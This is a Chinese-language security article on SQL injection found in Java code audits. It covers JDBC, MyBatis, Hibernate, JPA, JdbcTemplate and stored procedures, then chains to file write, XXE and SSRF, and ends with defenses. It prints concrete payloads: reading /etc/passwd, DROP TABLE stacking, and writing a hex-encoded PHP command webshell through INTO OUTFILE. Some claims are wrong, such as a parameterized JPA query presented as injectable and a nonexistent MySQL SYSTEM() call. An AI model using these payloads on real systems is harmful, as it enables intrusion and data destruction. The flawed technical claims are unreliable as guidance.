Java代码审计中的SQL注入漏洞深度解析与组合攻击<\/h1>

一、SQL注入漏洞原理与风险扩展<\/h2>

SQL注入不仅限于传统的数据库查询操作，还可能通过多种技术组合升级为更严重的远程代码执行(RCE)漏洞。其核心风险包括：<\/p>

数据泄露<\/strong>：获取敏感数据如用户凭证、个人信息<\/li>
权限提升<\/strong>：通过数据库特权执行系统命令<\/li>
持久化后门<\/strong>：写入Webshell或创建恶意存储过程<\/li>

网络渗透<\/strong>：利用数据库功能发起内网扫描<\/li> <\/ol>
二、Java中各类SQL注入场景详解<\/h2>
1. JDBC注入(基础型)<\/h3>
危险模式<\/strong>：<\/p>
String query =<\/span> "SELECT * FROM users WHERE username = '"<\/span> +<\/span> request.<\/span>getParameter<\/span>(<\/span>"user"<\/span>)<\/span> +<\/span> "'"<\/span>;<\/span> <\/span><\/span>Statement stmt =<\/span> conn.<\/span>createStatement<\/span>();<\/span> <\/span><\/span>ResultSet rs =<\/span> stmt.<\/span>executeQuery<\/span>(<\/span>query);<\/span> <\/span><\/span><\/code><\/pre>攻击Payload<\/strong>：<\/p> user=admin' UNION SELECT 1,load_file('\/etc\/passwd'),3-- - <\/code><\/pre> 2. MyBatis注入(动态SQL型)<\/h3> 危险场景<\/strong>：<\/p> <select<\/span> id=<\/span>"findUser"<\/span> parameterType=<\/span>"String"<\/span> resultType=<\/span>"User"<\/span>><\/span> <\/span><\/span> SELECT * FROM ${tableName} WHERE username = '${username}' <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> \/\/ 传入参数: tableName=users; DROP TABLE secrets -- username=admin' OR 1=1-- <\/code><\/pre> 3. Hibernate注入(HQL\/原生SQL型)<\/h3> 危险示例<\/strong>：<\/p> String hql =<\/span> "FROM User WHERE username = '"<\/span> +<\/span> input +<\/span> "' AND password = '"<\/span> +<\/span> pwd +<\/span> "'"<\/span>;<\/span> <\/span><\/span>Query query =<\/span> session.<\/span>createQuery<\/span>(<\/span>hql);<\/span> <\/span><\/span><\/code><\/pre>攻击向量<\/strong>：<\/p> input=admin' OR 1=1-- pwd=任意值 <\/code><\/pre> 4. JPA注入(新型ORM风险)<\/h3> 危险模式<\/strong>：<\/p> @Query<\/span>(<\/span>"SELECT u FROM User u WHERE u.username = ?1 AND u.password = ?2"<\/span>)<\/span> <\/span><\/span>User login<\/span>(<\/span>String user,<\/span> String pass);<\/span> <\/span><\/span><\/code><\/pre>绕过技巧<\/strong>：<\/p> 利用JPQL特性: user=admin' OR '1'='1'--<\/code><\/li> 参数截断攻击: 超长参数导致预编译失效<\/li> <\/ul> 5. JdbcTemplate注入(Spring风险)<\/h3> 错误用法<\/strong>：<\/p> String sql =<\/span> "UPDATE accounts SET balance = balance + "<\/span> +<\/span> amount +<\/span> " WHERE id = "<\/span> +<\/span> id;<\/span> <\/span><\/span>jdbcTemplate.<\/span>update<\/span>(<\/span>sql);<\/span> <\/span><\/span><\/code><\/pre>攻击方式<\/strong>：<\/p> amount=100; DROP TABLE accounts-- id=1 <\/code><\/pre> 6. 存储过程注入(高阶风险)<\/h3> 漏洞代码<\/strong>：<\/p> CallableStatement cs =<\/span> conn.<\/span>prepareCall<\/span>(<\/span>"{call get_user_data('"<\/span> +<\/span> input +<\/span> "')}"<\/span>);<\/span> <\/span><\/span><\/code><\/pre>RCE利用 (MySQL示例)<\/strong>:<\/p> input=1'); CREATE PROCEDURE attack() BEGIN SYSTEM('cat \/etc\/passwd > \/var\/www\/output'); END; CALL attack();-- <\/code><\/pre> 三、SQL注入与其他漏洞的组合利用<\/h2> 1. SQL注入 → 文件读写 → RCE<\/h3> 攻击链 (MySQL环境)<\/strong>:<\/p> -- 1. 通过注入写入Webshell <\/span><\/span><\/span><\/span>SELECT<\/span> 1<\/span>,2<\/span>,3<\/span> INTO<\/span> OUTFILE '\/var\/www\/html\/shell.php'<\/span> <\/span><\/span>LINES TERMINATED BY<\/span> 0<\/span>x3C3F7068702073797374656D28245F4745545B27636D64275D293B203F3E-- <\/span><\/span><\/span><\/span> <\/span><\/span>-- 2. 访问webshell执行命令 <\/span><\/span><\/span><\/span>http:\/\/<\/span>victim.com\/<\/span>shell.php?<\/span>cmd=<\/span>id <\/span><\/span><\/code><\/pre>2. SQL注入 → XXE联动攻击<\/h3> 攻击流程<\/strong>:<\/p> 通过SQL注入获取数据库中的XML内容<\/li> 触发XXE解析恶意实体<\/li> <\/ol> -- 获取包含XXE的XML配置 <\/span><\/span><\/span><\/span>UNION<\/span> SELECT<\/span> 1<\/span>,LOAD_FILE('\/opt\/app\/config.xml'<\/span>),3<\/span>,4<\/span>-- <\/span><\/span><\/span><\/code><\/pre>3. SQL注入 → SSRF组合<\/h3> 利用数据库功能<\/strong>:<\/p> 利用数据库的HTTP请求功能发起SSRF攻击<\/li> 通过数据库连接功能探测内网服务<\/li> <\/ul> 四、防御措施<\/h2> 参数化查询<\/strong>：始终使用PreparedStatement<\/li> ORM安全使用<\/strong>：避免拼接HQL\/JPQL<\/li> 输入验证<\/strong>：白名单验证所有输入<\/li> 最小权限原则<\/strong>：数据库账户使用最低权限<\/li> 安全编码规范<\/strong>：禁用动态表名\/列名<\/li> 防御深度<\/strong>：WAF+代码审计+运行时防护<\/li> <\/ol> 五、高级检测技术<\/h2> 污点分析<\/strong>：跟踪用户输入在代码中的传播<\/li> 语法树分析<\/strong>：检测SQL语句拼接模式<\/li> 运行时监控<\/strong>：拦截异常SQL语句执行<\/li> 模糊测试<\/strong>：自动化注入payload测试<\/li> <\/ol>